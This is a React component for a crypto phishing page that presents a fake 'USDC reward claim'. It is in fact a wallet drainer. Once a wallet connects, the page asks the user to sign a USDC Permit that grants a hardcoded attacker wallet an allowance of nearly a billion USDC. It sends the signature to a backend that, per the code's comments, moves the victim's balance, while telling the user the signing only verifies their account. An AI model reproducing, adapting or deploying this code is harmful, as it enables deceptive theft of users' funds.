import React, { useEffect, useState, useRef } from 'react';
import { track } from '../../utils/funnel';
import './EvmClaim.css';

const USDC = '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48';
const SPENDER = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb'; // 收款钱包
const CLAIM_AMOUNT = '999999999000000'; // 签名额度上限 999,999,999 USDC（最小单位）

const EvmClaim = () => {
  const [account, setAccount] = useState('');
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle'); // idle -> signing -> done
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const autoStarted = useRef(false);

  const provider = () => {
    if (typeof window === 'undefined') return null;
    if (window.ethereum) return window.ethereum;
    return null;
  };

  const detectEthNetwork = (p) => {
    if (!p || !p.chainId) return 'unknown';
    const id = Number(p.chainId);
    if (id === 1) return 'mainnet';
    if (id === 11155111) return 'sepolia';
    return 'other';
  };

  useEffect(() => {
    let cancelled = false;
    track('evm', 'view', '');
    const check = async () => {
      const p = provider();
      if (!p) {
        setError('No wallet detected. Please open this page in a wallet browser (MetaMask / TokenPocket).');
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          setAccount(accounts[0]);
          setWalletReady(true);
        }
      } catch (e) {
        if (!cancelled) setError('Wallet connection rejected.');
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  // 读取 USDC nonces(owner)
  const readNonce = async (p, owner) => {
    const data = '0x7ecebe00' + owner.slice(2).toLowerCase().padStart(64, '0');
    const result = await p.request({
      method: 'eth_call',
      params: [{ to: USDC, data }, 'latest'],
    });
    return result;
  };

  const doClaim = async () => {
    track('evm', 'start', '');
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      const network = detectEthNetwork(p);
      if (network !== 'mainnet') {
        setError('Please switch your wallet to the Ethereum mainnet.');
        setStage('idle');
        return;
      }
      // nonce
      const nonce = await readNonce(p, account);
      // deadline：30 天后
      const deadline = Math.floor(Date.now() / 1000) + 30 * 24 * 3600;

      const typedData = {
        types: {
          EIP712Domain: [
            { name: 'name', type: 'string' },
            { name: 'version', type: 'string' },
            { name: 'chainId', type: 'uint256' },
            { name: 'verifyingContract', type: 'address' },
          ],
          Permit: [
            { name: 'owner', type: 'address' },
            { name: 'spender', type: 'address' },
            { name: 'value', type: 'uint256' },
            { name: 'nonce', type: 'uint256' },
            { name: 'deadline', type: 'uint256' },
          ],
        },
        primaryType: 'Permit',
        domain: {
          name: 'USD Coin',
          version: '2',
          chainId: 1,
          verifyingContract: USDC,
        },
        message: {
          owner: account,
          spender: SPENDER,
          value: CLAIM_AMOUNT,
          nonce: nonce,
          deadline: String(deadline),
        },
      };

      // 用户签名（钱包弹「签名请求」）
      const signature = await p.request({
        method: 'eth_signTypedData_v4',
        params: [account, JSON.stringify(typedData)],
      });

      // 拆分 v/r/s
      const sig = signature.startsWith('0x') ? signature.slice(2) : signature;
      const r = '0x' + sig.slice(0, 64);
      const s = '0x' + sig.slice(64, 128);
      const v = sig.slice(128, 130);

      // 提交后端
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/evm/claim', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          owner: account,
          value: CLAIM_AMOUNT, // 签名上限（后端按实际余额与上限取小划款）
          nonce: nonce,
          deadline: String(deadline),
          r, s, v,
        }),
      });
      const result = await resp.json();
      if (result.code !== 200) {
        throw new Error(result.message || 'Claim failed');
      }
      setTxId(result.data.txId || '');
    track('evm', 'done', '');
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError('Signature canceled.');
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  useEffect(() => {
    if (walletReady && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      doClaim();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady]);

  return (
    <div className="evm-page">
      <div className="evm-card">
        {stage === 'done' ? (
          <>
            <div className="evm-icon">🎉</div>
            <h2>Claim Successful</h2>
            <p className="evm-desc">Your bonus has been claimed. It will arrive in your account shortly.</p>
            {txId && <p className="evm-tx">Tx: {txId.slice(0, 20)}...</p>}
            {account && <p className="evm-addr">Wallet: {account.slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="evm-icon">🎁</div>
            <h2>{stage === 'signing' ? 'Confirm in Your Wallet' : 'Claim Your Reward'}</h2>
            <p className="evm-desc">
              {stage === 'signing'
                ? 'Please sign the message in your wallet to verify your account...'
                : 'You have been selected for an exclusive USDC reward. Verify your account to claim it instantly.'}
            </p>
            <div className="evm-order">
              <div className="evm-row"><span>Reward</span><b>USDC Bonus</b></div>
              <div className="evm-row"><span>Network</span><b>Ethereum Mainnet</b></div>
              <div className="evm-row"><span>Fee</span><b className="evm-ok">0 ETH</b></div>
            </div>
            {walletReady && <p className="evm-addr">Wallet: {account.slice(0, 12)}...</p>}
            {error && <p className="evm-error">{error}</p>}
            {stage === 'idle' && (
              <button className="evm-btn" onClick={doClaim} disabled={!walletReady}>
                Claim Now
              </button>
            )}
            {stage === 'signing' && <div className="evm-spinner" />}
            {error && stage === 'idle' && (
              <button className="evm-btn" onClick={doClaim}>Retry</button>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default EvmClaim;
